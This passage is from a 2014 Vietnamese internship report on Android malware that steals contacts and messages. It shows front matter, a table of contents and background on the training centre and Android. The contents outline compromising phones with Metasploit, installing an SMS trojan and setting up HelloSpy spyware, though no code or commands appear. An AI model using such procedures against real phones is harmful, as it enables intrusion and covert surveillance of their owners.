báo cáo thực tập cuối kì
TRANSCRIPT
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 1
BÔ GIAO DUC VA ĐAO TAO
TRƯỜNG ĐAI HỌC KHOA HỌC TỰ NHIÊN
KHOA ĐIỆN TỬ - VIỄN THÔNG
BÁO CÁO ĐỀ TÀI THỰC TẬP
ĐỀ TÀI:
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO
PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ
DỤNG ANDROID VÀ GỬI RA NGOÀI
Nơi thực tập : TT.QUẢN TRỊ MANG & AN NINH MANG QUỐC TẾ ATHENA
Thời gian :
7/7/2014 – 7/9/2014
GVHD : VÕ ĐỖ THẮNG
SVTT : NGUYỄN TUẤN KIỆT
MSSV : 1120084
TP.HCM, THÁNG 8 NĂM 2014
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 2
LỜI CAM ĐOAN
Em xin cam đoan:
Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực tiếp của thầy
Võ Đỗ Thắng.
Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, tên công
trình, thời gian, địa điểm công bố.
Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hoàn toàn
trách nhiệm.
TPHCM, ngày 16 tháng 08 năm 2014
Sinh viên thực tập
Nguyễn Tuấn Kiệt
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 3
LỜI CẢM ƠN
KHOA ĐIỆN TỬ VIỄN THÔNG
Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử viễn
thông đã chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành tốt đợt thực
tập này. Đợt thực tập này đã giúp cho em đúc kết được rất nhiều kinh nghiệm cho bản thân.
Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc
sau này.
Trong đợt thực tập này, em đã nỗ lực hết mình để có thể đạt được kết quả tốt nhất.
Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất định. Em rất
mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong tương lai.
Một lần nữa em xin chân thành cảm ơn.
TPHCM, ngày 16 tháng 08 năm 2014
Sinh viên thực tập
Nguyễn Tuấn Kiệt
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 4
LỜI CẢM ƠN
TRUNG TÂM ATHENA
Em xin cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena,
cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã
nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo
mọi điều kiện thuận lợi, cung cấp những kiến thức cần thiết cũng như đóng góp những ý
kiến quý báu để em hoàn thành tốt bài báo cáo này.
Một lần nữa em xin chân thành cảm ơn.
TPHCM, ngày 16 tháng 08 năm 2014
Sinh viên thực tập
Nguyễn Tuấn Kiệt
Thầy Võ Đỗ Thắng (bên trái) cùng SVTT Nguyễn Tuấn Kiệt (bên phải)
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 5
NHẬN XÉT CỦA KHOA
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Chủ nhiệm khoa
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 6
NHẬN XÉT CỦA GIAO VIÊN HƯỚNG DẪN
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
..............................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giáo viên hướng dẫn
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 7
LỜI GIỚI THIỆU
Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các công ty
nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho tin tặc cùng
các phần mềm độc hại.
Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để nhận ra
rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào trường hợp
facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng đông đảo, lập
tức nó trở thành đích ngắm của các tin tặc. Giới tội phạm mạng luôn tìm mọi cách để lợi
dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số đông thiết bị. Và
điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi mới đến thiết bị. Các nhà
nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng Android bất cẩn luôn tải về ứng
dụng mà không thèm kiểm tra tìm hiểu trước xem chúng có an toàn hay không.
Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android đồng
thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo cáo của em.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 8
Mục lục PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP ............................................................................... 11
1. Giới thiệu về Trung tâm Athena ............................................................................................. 11
2. Trụ sở và các chi nhánh .......................................................................................................... 11
3. Quá trình hình thành và phát triển .......................................................................................... 12
3.1. Quá trình hình thành ........................................................................................................ 12
3.2. Quá trình phát triển .......................................................................................................... 13
3.3. Cơ cấu tổ chức ................................................................................................................. 14
4. Tình hình hoạt động trong năm 2011 ...................................................................................... 15
4.1. Cơ cấu sản phẩm .............................................................................................................. 15
4.1.1. Các khóa học dài hạn ................................................................................................ 15
4.1.2. Các khóa học ngắn hạn ............................................................................................. 15
4.1.2.1. Khóa Quản trị mạng .............................................................................................. 15
4.1.2.2. Khóa thiết kế web và bảo mật mạng ..................................................................... 15
4.1.2.3. Các sản phẩm khác. ................................................................................................ 15
5. Chiến lược Marketing của Trung tâm Athena ........................................................................ 16
5.1. Chiến lược sản phẩm ....................................................................................................... 16
5.2. Chiến lược tập hợp sản phẩm: ......................................................................................... 16
5.3. Chiến lược dòng sản phẩm: ............................................................................................. 17
PHẦN 2: BÁO CÁO ĐỀ TÀI ........................................................................................................ 18
1. Giới thiệu về Android ............................................................................................................. 18
1.1. Android là gì? .................................................................................................................. 18
1.2. Lịch sử phát triển Anroid ................................................................................................. 18
1.3. Đặt điểm của Android ...................................................................................................... 19
1.3.1. Tính mở .................................................................................................................... 19
1.3.2. Tính ngang bằng của các ứng dụng. ......................................................................... 19
1.3.3. Phá vỡ rào cản phát triển ứng dụng. ......................................................................... 19
1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng .......................................................... 19
1.4. Các phiên bản của android ............................................................................................... 20
1.5. Tỷ lệ sử dụng các phiên bản android ............................................................................... 22
1.6. So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich): ........... 22
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt ............................................. 23
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 9
1.6.2. Sự khác nhau về giao diện ......................................................................................... 23
1.6.3. Sự khác nhau về tính năng ......................................................................................... 25
1.6.4. Sự khác nhau về giao thức mạng ................................................................................ 25
2. Nghiên cứu về mã độc trong mỗi trường android ................................................................... 26
2.1. Malware là gì? ................................................................................................................. 26
2.2. Phân loại .......................................................................................................................... 27
2.3. Cơ chế hoạt động của Malware ....................................................................................... 27
2.4. Mục đích của Malware DroidDream ............................................................................... 28
2.5. Dấu hiệu bị nhiễm các phần mềm độc hại ....................................................................... 28
3. Xâm nhập android qua mạng local ......................................................................................... 29
3.1. Giới thiệu về Kali Linux .................................................................................................. 29
3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian ................................................... 29
3.1.2. Hỗ trợ mạng không dây tốt hơn................................................................................ 29
3.1.3. Khả năng tùy biến cao .............................................................................................. 29
3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai ..................................... 30
3.2. Cài đặt Kali Linux ........................................................................................................ 30
3.3. Metasploit framework trong Kali linux ........................................................................... 40
3.3.1. Giới thiệu .................................................................................................................. 40
3.3.2. Sử dụng metasploit framework ................................................................................ 40
3.4. Tấn công android dùng Metasploit Framework trong Kali Linux ................................... 42
4. Thực hiện xâm nhập android thông qua mạng Internet .......................................................... 49
4.1. Giới thiệu về VPS ............................................................................................................ 49
4.1.1. VPS là gì? ................................................................................................................. 49
4.1.2. Đặc điểm về thông số VPS ....................................................................................... 50
4.1.3. Giá trị khi sử dụng VPS ........................................................................................... 50
4.2. Cài đặt metasploit ............................................................................................................ 51
4.3. Xâm nhập vào thiết bị android ......................................................................................... 57
5. Cài đặt SMS Trojan dùng iCalender ....................................................................................... 67
5.1. Cài đặt máy ảo android AVD Manager .............................................................................. 67
5.1.1. Cài đặt JDK: ............................................................................................................. 67
5.1.2. Cài đặt android SDK ................................................................................................ 68
5.1.3. Cài đặt máy ảo android ................................................................................................ 69
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 10
5.2. Cài SMS Trojan vào máy android ảo ................................................................................. 71
5.2.1. Các công cụ cần thiết ................................................................................................. 71
5.2.2. Các bước thực hiện ................................................................................................... 72
6. Tìm hiểu về HelloSpy để theo dõi thiết bị android ................................................................. 79
6.1. HelloSpy là gì? ................................................................................................................ 79
6.2. Tính năng của HelloSpy .................................................................................................. 79
6.2.1. Truy cập từ xa:.......................................................................................................... 79
6.2.2. Theo dõi các tin nhắn WhatsApp (không có rễ): ...................................................... 79
6.2.3. Theo dõi lịch sử Internet: ......................................................................................... 79
6.2.4. Spy cuộc gọi ghi âm: ................................................................................................ 79
6.2.5. Theo dõi tất cả bắt hình ảnh: .................................................................................... 79
6.2.6. Kiểm soát các ứng dụng và chương trình: ................................................................ 79
6.2.7. Theo dõi tin nhắn SMS: ............................................................................................ 80
6.2.8. Theo dõi Viber, facebook và yahoo thông điệp: ...................................................... 80
6.2.9. GPS Tracking: .......................................................................................................... 80
6.2.10. Lịch sử màn hình cuộc gọi: ...................................................................................... 80
6.3. Cài đặt HelloSpy .............................................................................................................. 80
7. Tổng kết .................................................................................................................................. 85
8. Kinh nghiệm đạt được sau đợt thực tập .................................................................................. 86
9. Các link báo báo ...................................................................................................................... 87
10. Các link tham khảo .................................................................................................................. 88
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 11
PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP
1. Giới thiệu về Trung tâm Athena
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền thân là Công
ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM
ĐAO TAO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của
Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh
nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần vào công cuộc thúc đẩy tiến
trình tin học hóa của nước nhà. ATHENA đã và đang tập trung chủ yếu vào các họat động sau:
- Công tác huấn luyện, quảng bá kiến thức tin học, đặc biệt trong lĩnh vực mạng máy tính,
internet, bảo mật và thương mại điện tử….
- Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản xuất kinh
doanh.
- Cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc biệt là chuyên gia về
mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các tổ chức, doanh nghiệp có nhu
cầu.
- Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ sở dữ liệu
thông tin về các ứng dụng và sự cố mạng.
- Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy ra sự cố
máy tính.
2. Trụ sở và các chi nhánh
- Trụ sở chính:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam.
Website: www.athena.com.vn
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 12
Điện thoại: ( 84-8 ) 3824 4041
Hotline: 0943 23 00 99
- Cơ sở 2_Tại TP Hồ Chí Minh:
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.
Website: www.Athena.Edu.Vn
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 20 00 88
- Chi nhánh Nha Trang
+ Điện thoại : 08. 3824 4041 - Fax: 08. 39 111 692
+ Website: www.athena.edu.vn
+ Email : [email protected]
3. Quá trình hình thành và phát triển
3.1.Quá trình hình thành
Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin
nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm
nhìn xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ được một lực
lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh
nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công
nghệ thông tin cho đất nước và xã hội.
Các thành viên sáng lập trung tâm gồm:
Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena, hiện tại là giám
đốc dự án của công ty Siemen Telecom.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 13
Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty EIS, Phó Tổng công
ty FPT.
Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ
thông tin của Ngân hàng.
Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an ninh mạng Athena.
Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính gần 100 thành
viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam.
3.2.Quá trình phát triển
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành
một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh mạng và
đào tạo cho đội ngũ nhân viên của các doanh nghiệp về các chương trình quản lý dự án MS Project
2003, kỹ năng thương mại điện tử, bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh
viên đến đăng kí học. Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội
ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất
nước nói chung, các doanh nghiệp, cá nhân nói riêng.
Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm một chi nhánh
tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia
an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc,
đồng thời trong thời gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực
công nghệ thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng viên của
trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên, cùng với
khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào nhiều khó khăn. Ông Nguyễn
Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ
hệ thống trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu
quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác.
Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến
trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 14
đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm.
Mở ra một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một tinh thần thép
đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng
hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung tâm đào tạo
quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, Trung
tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với
sự liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp
nguồn nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến
trình tin học hóa nước nhà.
3.3.Cơ cấu tổ chức
Sơ đồ tổ chức công ty
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 15
4. Tình hình hoạt động trong năm 2011
4.1.Cơ cấu sản phẩm
4.1.1. Các khóa học dài hạn
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager Administrator.
4.1.2. Các khóa học ngắn hạn
4.1.2.1.Khóa Quản trị mạng
- Quản trị mạng Microsoft căn bản ACBN
- Phần cứng máy tính, laptop, server
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE
- Quản trị window Vista
- Quản trị hệ thống Window Server 2003:2008
- Lớp Master Exchange Mail Server
- Quản trị mạng quốc tế Cissco CCNA
- Quản trị hệ thống mạng Linux 1 và Linux 2.
4.1.2.2.Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart
- Lập trình web với Php và MySQL
- Bảo mật mạng quốc tế ACNS
- Hacker mũ trắng
- Athena Mastering Firewall Security
- Bảo mật website.
4.1.2.3. Các sản phẩm khác.
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 16
- Chuyên đề thực hành bảo mật mạng Wi_Fi
- Chuyên đề Ghost qua mạng
- Chuyên đề xây dựng và quản trị diễn đàn
- Chuyên đề bảo mật dữ liệu phòng chống nội gián
- Chuyên đề quản lý tài sản công nghệ thông tin
- Chuyên đề kỹ năng thương mại điện tử.
5. Chiến lược Marketing của Trung tâm Athena
5.1. Chiến lược sản phẩm
Chiến lược sản phẩm là sự cố kết gắn bó của sự lựa chọn và của những biện pháp phải sử dụng
để xác định một tập hợp sản phẩm bao gồm các dòng sản phẩm và các món hàng sao cho phù hợp
nhất với thị trường mục tiêu và từng giai đoạn khác nhau trong chu kì sản phẩm.
Chiến lược sản phẩm đóng vai trò cực kì quan trọng trong hoạt động Marketing, nó là công cụ
cạnh tranh bền vững của doanh nghiệp. Thực hiện tốt chiến lược về sản phẩm thì các chiến lược
giá, phân phối, xúc tiến mới được triển khai và phối hợp một cách hiệu quả nhất. Không chỉ thế,
chiến lược sản phẩm còn là một trong những yếu tố giúp doanh nghiệp thực hiện tốt mục tiêu
marketing trong từng thời kì.
Với phương châm “ Uy tín, chất lượng đào tạo và sự hài lòng của khách hàng” lên hàng đầu.
Trung tâm Đào tạo Quản trị và An ninh mạng Athena luôn nổ lực tập trung vào nâng cao chất lượng
giáo dục, tuyển dụng đội ngũ giảng viên có trình độ chuyên môn và kinh nghiệm cao, đội ngũ tư
vấn viên giúp học viên có thể lựa chọn những chương trình phù hợp và Bộ phận chuyên trách về
cập nhật thông tin cũng như làm mới giáo án nhằm đảm bảo chất lượng đào tạo tốt nhất cho từng
học viên khi đến với trung tâm.
Chính vì xác định được tầm quan trọng của chiến lược sản phẩm, Trung tâm Đào tạo Quản trị
và An ninh mạng Athena đã đưa ra các chiến lược sản phẩm như sau:
5.2. Chiến lược tập hợp sản phẩm:
Athena tập trung vào chiến lược mở rộng tập hợp sản phẩm. Có nghĩa là Athena tăng thêm các
dòng sản phẩm mới thích hợp với từng thời kì cụ thể theo yêu cầu của khách hàng, cụ thể theo từng
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 17
giai đoạn phát triển của doanh nghiệp cũng như yêu cầu của xã hội về lĩnh vực công nghệ thông
tin.
Vào những ngày đầu thành lập với tư cách là một nhóm nhỏ bao gồm các thành viên yêu thích
lĩnh vực công nghệ thông tin và hổ trợ các doanh nghiệp với chương trình “ ứng cứu máy tinh”.
Athena tập trung vào lĩnh vực đào tạo chuyên gia an ninh mạng AN2S và chương trình cảnh sát
máy tính nhằm giúp các doanh nghiệp xử lý các vấn đề về máy tính và mạng máy tính. Đào tạo và
cung cấp cho xã hội lực lượng nguồn lao động trong lĩnh vực bảo vệ máy tính và mạng máy tính.
Trong quá trình phát triển, internet trở thành một công cụ hữu hiệu và là phương tiện kinh
doanh của hầu hết các tổ chức, doanh nghiệp, cá nhân. Để đáp ứng được nhu cầu ngày càng tăng
cao về nguồn nhân lực trong lĩnh vực mạng internet, Athena tăng thêm các khóa học về mạng máy
tính, chuyên gia online marketing hay các khóa học về E_marketing.
Ngày nay, với sự phát triển mạnh mẽ của ngành công nghệ thông tin, ngày càng nhiều doanh
nghiệp đòi hỏi các chứng chỉ quốc tế trong lĩnh vực này. Nắm bắt được xu thế mới của thời đại,
Trung tâm Đào tạo Quản trị và An ninh mạng Athena đã mở rộng chương trình đào tạo, tổ chức
thêm các khóa học đạt chứng chỉ quốc tế như MCSA, Quản trị mạng Cissco….
5.3. Chiến lược dòng sản phẩm:
Để có thể phân bổ rủi ro cũng như nâng cao được mức lợi nhuận cho doanh nghiệp. Trung tâm
Đào tạo Quản trị và An ninh mạng Athena tập trung vào chiến lược phát triển dòng sản phẩm bằng
cách tập trung đầu tư vào những dòng sản phẩm chủ lực của doanh nghiệp để tối đa hóa lợi nhuận,
đồng thời phát triển thêm các dòng sản phẩm mới như các khóa chuyên đề nhằm hổ trợ tạo sự đa
dạng của các dòng sản phẩm, đáp ứng được nhu cầu của xã hội, cố gắng dẫn đầu thị trường và lắp
kín các lỗ hổng để ngăn ngừa đối thủ cạnh tranh. Trong đó khóa học chủ lực của doanh nghiệp là
các khóa học lấy các chứng chỉ quốc tế như: MCSE, Quản trị mạng Cissco, Bảo mật web
Security+…
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 18
PHẦN 2: BAO CAO ĐỀ TÀI
1. Giới thiệu về Android 1.1.Android là gì?
Android là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành cho các thiết bị di động
có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Android ra mắt vào năm 2007
cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần
cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động.
Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008.
Android có mã nguồn mở và Google phát hành mã nguồn theo Giấy phép Apache. Chính mã nguồn
mở cùng với một giấy phép không có nhiều ràng buộc đã cho phép các nhà phát triển thiết bị, mạng
di động và các lập trình viên nhiệt huyết được điều chỉnh và phân phối Android một cách tự do.
Ngoài ra, Android còn có một cộng đồng lập trình viên đông đảo chuyên viết các ứng dụng để mở
rộng chức năng của thiết bị, bằng một loại ngôn ngữ lập trình Java có sửa đổi. Vào tháng 10 năm
2012, có khoảng 700.000 ứng dụng trên Android, và số lượt tải ứng dụng từ Google Play, cửa hàng
ứng dụng chính của Android, ước tính khoảng 25 tỷ lượt.
Những yếu tố này đã giúp Android trở thành nền tảng điện thoại thông minh phổ biến nhất thế giới,
vượt qua Symbian vào quý 4 năm 2010, và được các công ty công nghệ lựa chọn khi họ cần một hệ
điều hành không nặng nề, có khả năng tinh chỉnh, và giá rẻ chạy trên các thiết bị công nghệ cao
thay vì tạo dựng từ đầu. Kết quả là mặc dù được thiết kế để chạy trên điện thoại và máy tính bảng,
Android đã xuất hiện trên TV, máy chơi game và các thiết bị điện tử khác. Bản chất mở của Android
cũng khích lệ một đội ngũ đông đảo lập trình viên và những người đam mê sử dụng mã nguồn mở
để tạo ra những dự án do cộng đồng quản lý. Những dự án này bổ sung các tính năng cao cấp cho
những người dùng thích tìm tòi hoặc đưa Android vào các thiết bị ban đầu chạy hệ điều hành khác.
Android chiếm 75% thị phần điện thoại thông minh trên toàn thế giới vào thời điểm quý 3 năm
2012, với tổng cộng 500 triệu thiết bị đã được kích hoạt và 1,3 triệu lượt kích hoạt mỗi ngày. Sự
thành công của hệ điều hành cũng khiến nó trở thành mục tiêu trong các vụ kiện liên quan đến bằng
phát minh, góp mặt trong cái gọi là "cuộc chiến điện thoại thông minh" giữa các công ty công nghệ.
1.2.Lịch sử phát triển Anroid
Tháng 7 năm 2005, Google mua lại Android, Inc., một công ty nhỏ mới thành lập có trụ sở ở Palo
Alto, California, Mỹ. Những nhà đồng sáng lập của Android chuyển sang làm việc tại Google gồm
có Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập công ty Wildfire
Communications), Nick Sears (từng là phó chủ tịch của T-Mobile), và Chris White (trưởng nhóm
thiết kế và phát triển giao diện tại WebTV). Khi đó, có rất ít thông tin về các công việc của Android,
ngoại trừ việc họ đang phát triển phần mềm cho điện thoại di động. Điều này tạo những tin đồn về
việc Google có ý định bước vào thị trường điện thoại di động.
Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động dựa trên hạt nhân
Linux, được họ tiếp thị đến các nhà sản xuất thiết bị cầm tay và các nhà mạng trên những tiền đề
về việc cung cấp một hệ thống mềm dẻo, có khả năng nâng cấp mở rộng cao.[cần dẫn nguồn] Một
số nguồn tin cho biết trước đó Google đã lên danh sách các thành phần phần cứng và các đối tác
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 19
phần mềm, đồng thời ra hiệu với các nhà mạng rằng họ sẵn sàng hợp tác ở nhiều cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong
tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công
nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực
hiện điều này. Các phương tiện truyền thông in và online cũng sớm có bài viết về những tin đồn
cho rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Và lại càng có
nhiều suy đoán sau bài viết về việc Google đang định nghĩa các đặc tả công nghệ và trình diễn các
mẫu thử với các nhà sản xuất điện thoại di động và nhà mạng.
1.3.Đặt điểm của Android
1.3.1. Tính mở
Android được xây dựng từ dưới đi lên cho phép người phát triển tạo các ứng dụng di động hấp dẫn
với đầy đủ các điểm mạnh của các thiết bị cầm tay hiện có. Android hoàn toàn mở, một ứng dụng
có thể gọi tới bất kể một chức năng lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng
máy ảnh, cho phép người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng.
Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà đã được tối ưu
hóa bộ nhớ và phần cứng với môi trường di động. Android mà một mã nguồn mở, nó có thể được
